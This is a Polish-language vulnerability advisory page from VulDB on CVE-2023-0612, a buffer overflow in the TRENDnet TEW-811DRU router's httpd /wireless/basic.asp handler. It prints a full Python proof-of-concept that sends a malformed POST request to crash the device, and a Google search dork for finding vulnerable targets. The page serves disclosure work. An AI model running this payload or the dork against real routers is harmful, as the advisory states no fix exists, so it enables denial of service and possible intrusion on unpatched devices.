TRENDnet TEW-811DRU 1.0.10.0 httpd /wireless/basic.asp memory corruption

CVSS Wynik metatemperaturyExploit Aktualna Cena (≈)Wynik odsetkowy CTI
7.3$0-$5k0.00

Podatność, która została odkryta w TRENDnet TEW-811DRU 1.0.10.0. Dotknięta jest nieznana funkcja w pliku /wireless/basic.asp w komponencie httpd. Dzięki manipulacji przy użyciu nieznanych danych wejściowych można doprowadzić do wystąpienia podatności przepełnienie bufora. Dokładne konsekwencje udanego ataku są dotychczas nieznane.

Informacja o podatności została opublikowana w dniu upubliczniona 2023-02-01. Podatność ta jest znana jako CVE-2023-0612. Techniczne szczegóły i publiczny exploit są znane.

Exploit został stworzony w Python. Exploit można ściągnąć pod adresem vuldb.com. Uważa się go za proof-of-concept. Poprzez wyszukiwanie inurl:wireless/basic.asp, możliwe jest odnajdowanie podatnych celów przy użyciu techniki Google Hacking. Kod uzywany jest przez wykorzystanie:

import requests,socket
import re
import time
from urllib.parse import urlencode

device_web_ip = '192.168.10.1'

request = {'HEAD': 
{'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded', 
'Content-Length': '2365', 
'Origin': 'http://0.0.0.0:8080', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8080/wireless/basic.asp', 
'Cookie': 'expandable=3c', 
'Upgrade-Insecure-Requests': '1'
}, 
'PARAM': 
{'page': '/wireless/basic.asp', 
b'\xff\x99\xc3\x8a\x02\xff\x7f\\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX', 
b'wl_inpt': b'1', 
'wl_bssid': 2, 
'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f', 
b'wl_\xef\x00\x14\x00\x01': 0, 
'wl_ssid': 'dummy', 
b'l\x80cl\xff\xff\xff': 0, 
'wl_chanspec': 40, 
b'wl_\x90l_\x90': 4, 
'wl_wds0': '00:0c:29:d9:40:fe', 
b'll\x10': '00:0c:29:d9:40:ff', 
'wl_wds2': '00:0c:29:d1:40:fe', 
b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe', 
b'\x81\x80wwwwwww|wwwwwwwww': 0, 
b'wl\xff\xff\xff\x04\x00timeout': 1, 
b'\x00\x10\x7f\x89FF': 0, 
'wl_country_code': b'\x00\x80', 
'wl_country_rev': 27, 
'wl_radio': b'\x1e', 
'wl_nband': 1, 
'wl_txchain': 3, 
'wl_rxchain': b'3', 
'wl_nmode_protection': 'auto', 
'wl_vlan_prio_mode': b'Rl\x80\x80', 
'wl_rate': 0, 
'wl_rateset': b'h', 
'wl_mrate': 0, 
'wl_bcmdcs': 'off', 
'wl_antdiv': -1, 
'wl_reg_mode': 'off', 
'wl_tpc_db': b'00', 
'wl_obss_coex': b'1', 
'wl_frag': 2346, 
'wl_rts': b'3@', 
'wl_dtim': b'\x7f', 
b'\x85\xff\x10\x05\xff': 100, 
'wl_bcn_rotate': b'1', 
'wl_maxassoc': 128, 
'wl_frameburst': b'j\\', 
'wl_ampdu': b'V\x82', 
'wl_rifs': b'~\x9boo', 
'wl_rifs_advert': b'au\x7fo', 
'wl_stbc_tx': b'\x03', 
'wl_wme': b'nn', 
'wl_wme_no_ack': b'\x10\x00\x9a', 
b'_w\xff\xff': 'on', 
'wme_ap': b'(\x9e\x80', 
'wl_wme_ap_be': 5, 
'wl_wme_ap_be0': b'\x861', 
'wl_wme_ap_be1': 63, 
'wl_wme_ap_be2': 3, 
'wl_wme_ap_be3': 0, 
'wl_wme_ap_be4': 0, 
b'w\x05\xff\xff\x85e_a\x87_beD': 'off', 
'wl_wme_ap_be6': b'\x9a', 
'wl_wme_ap_bk': 5, 
'wl_wme_ap_bk0': b'\xc3\xbc', 
b'wl_wm{_apZbk1': 1023, 
'wl_wme_ap_bk2': 7, 
'wl_wme_ap_bk3': b'008', 
'wl_wme_ap_bk4': 0, 
'wl_wme_ap_bk5': b'ofo', 
'wl_wme_ap_bk6': b'\x80\x80\x00\xdb', 
'wl_wme_ap_vi': 5, 
'wl_wme_ap_vi0': 7, 
'wl_wme_ap_vi1': b'1G\xc3G', 
b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1, 
'wl_wme_ap_vi3': 6016, 
'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad', 
'wl_wme_ap_vi5': b'\xff\xff\x17', 
'wl_wme_ap_vi6': 'off', 
b'wl[wmeIap_vo': 5, 
'wl_wme_ap_vo0': 3, 
'wl_wme_ap_vo1': b'\xc3\xae\xf5', 
'wl_wme_ap_vo2': 1, 
'wl_wme_ap_vo3': b'\xff\x05\xff\xff', 
'wl_wme_ap_vo4': b'P', 
b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf', 
'wl_wme_ap_vo6': b'oLd', 
b'ws]\xc2\x90\xc2\x90Ke': b'x', 
'wl_wme_sta_be': 5, 
'wl_wme_sta_be0': 15, 
b'\xf1\x00\xff\x0f': 1023, 
'wl_wme_sta_be2': 3, 
b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_', 
b't\x81\x803t\x81a3': 0, 
'wl_wme_sta_be5': b'oof', 
'wl_wme_sta_be6': b'boff', 
'wl_wme_sta_bk': 5, 
'wl_wme_sta_bk0': 15, 
'wl_wme_sta_bk1': 1023, 
'wl_wme_sta_bk2': 7, 
b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f', 
'wl_wme_sta_bk4': 0, 
'wl_wme_sta_bk5': b'd', 
'wl_wme_sta_bk6': 'off', 
'wl_wme_sta_vi': 5, 
b'wlTwulTwuekQ\x84': 7, 
'wl_wme_sta_vi1': 15, 
'wl_wme_sta_vi2': 2, 
'wl_wme_sta_vi3': 6016, 
'wl_wme_sta_vi4': 3008, 
'wl_wme_sta_vi5': 'off', 
'wl_wme_sta_vi6': 'off', 
'wl_wme_sta_vo': 5, 
b'wP_wme_s\x00\x01\xff\xe7\x070': 3, 
'wl_wme_sta_vo1': 7, 
b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2, 
'wl_wme_sta_vo3': b'\x80\x00\x80\x0164', 
b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00', 
'wl_wme_sta_vo5': b'Qff', 
'wl_wme_sta_vo6': 'off', 
'wme_txp': 8, 
'wl_wme_txp_be0': 7, 
b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90', 
'wl_wme_txp_be2': 4, 
'wl_wme_txp_be3': 2, 
'wl_wme_txp_be4': 0, 
'wl_wme_txp_bk': 5, 
'wl_wme_txp_bk0': b'O', 
b'_wmwme_txp_\x85k1': 3, 
'wl_wme_txp_bk2': 4, 
'wl_wme_txp_bk3': 2, 
'wl_wme_txp_bk4': 0, 
'wl_wme_txp_vi': 5, 
'wl_wme_txp_vi0': 7, 
'wl_wme_txp_vi1': 3, 
'wl_wme_txp_vi2': 4, 
'wl_wme_txp_vi3': 2, 
'wl_wme_txp_vi4': 0, 
'wl_wme_txp_vo': 5, 
b'wl_w\x0b\x0b\n\x0bxp_vo0': 7, 
b't\x01': b'M', 
b'l_wme_me_txp_txp__tx': 4, 
'wl_wme_txp_vo3': b':', 
'wl_wme_txp_vo4': 0, 
'wl_mode': 'ap', 
'wl_ure': 0, 
'wl_bridge': 0, 
'wl_vlan_prio_mode__117_66oo': b'ome', 
b'/wipeless/basic.asp': b'', 
b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff', 
'wan_summary_2_pppoe_username': '', 
'mainform_submit': '', 
b'/tapppp.cgi': '', 
'openheader': b''
}, 
'ATTR': 
{'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip), 
'METHOD': 'POST', 
'VERSION': 'HTTP/1.1'
}
}

headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']

try:
  r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5)
except Exception as e:
  print('error:{}'.format(e))

Nie są znane żadne środki zaradcze. Sugerowana jest zamiana podatnego komponentu na produkt alternatywny.

Produktinfo

Sprzedawca

Imię

Wersja

Licencja

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Wektor: 🔍
VulDB Niezawodność: 🔍

CVSSv3info

VulDB Wynik metabazy: 7.5
VulDB Wynik metatemperatury: 7.3

VulDB Wynik podstawowy: 7.5
VulDB Wynik tymczasowy: 6.8
VulDB Wektor: 🔍
VulDB Niezawodność: 🔍

NVD Wynik podstawowy: 7.5
NVD Wektor: 🔍

CNA Wynik podstawowy: 7.5
CNA Wektor (VulDB): 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
WektorMożliwość wykorzystaniaUwierzytelnianiePoufnośćIntegralnośćDostępność
odblokowaćodblokowaćodblokowaćodblokowaćodblokowaćodblokować
odblokowaćodblokowaćodblokowaćodblokowaćodblokowaćodblokować
odblokowaćodblokowaćodblokowaćodblokowaćodblokowaćodblokować

VulDB Wynik podstawowy: 🔍
VulDB Wynik tymczasowy: 🔍
VulDB Niezawodność: 🔍

NVD Wynik podstawowy: 🔍

Exploitinfo

Klasa: Przepełnienie bufora
CWE: CWE-120 / CWE-119
CAPEC: 🔍
ATT&CK: 🔍

Lokalny: Nie
Zdalny: Tak

Dostępność: 🔍
Dostęp: Publiczny
Status: Proof-of-Concept
Język programowania: 🔍
Pobierać: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Przewidywanie ceny: 🔍
Aktualny szacunek cena: 🔍

0-Dayodblokowaćodblokowaćodblokowaćodblokować
Dzisiajodblokowaćodblokowaćodblokowaćodblokować

Inteligencja Zagrożeńinfo

Wysiłek: 🔍
Aktywni aktorzy: 🔍
Aktywne grupy APT: 🔍

Przeciwdziałanieinfo

Zalecane: wiadomo nie ograniczanie
Status: 🔍

0-dniowy czas: 🔍

Oś czasuinfo

2023-02-01 🔍
2023-02-01 +0 dni 🔍
2023-02-01 +0 dni 🔍
2023-03-01 +28 dni 🔍

Źródłainfo

Status: Nie określono

CVE: CVE-2023-0612 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013

Wpisinfo

Stworzono: 2023-02-01 14:36
Aktualizacje: 2023-03-01 11:23
Zmiany: 2023-02-01 14:36 (42), 2023-02-01 17:52 (1), 2023-03-01 11:16 (2), 2023-03-01 11:23 (27)
Kompletny: 🔍
Zgłaszający: leetsun
Cache ID: 18:5CF:103

Submitinfo

Przyjęty

  • Submit #76180: Web crash of TRENDnet router TEW-811DRU (przez leetsun)

Dyskusja

Brak komentarzy. Języki: pl + en.

Zaloguj się, aby skomentować.

Might our Artificial Intelligence support you?

Check our Alexa App!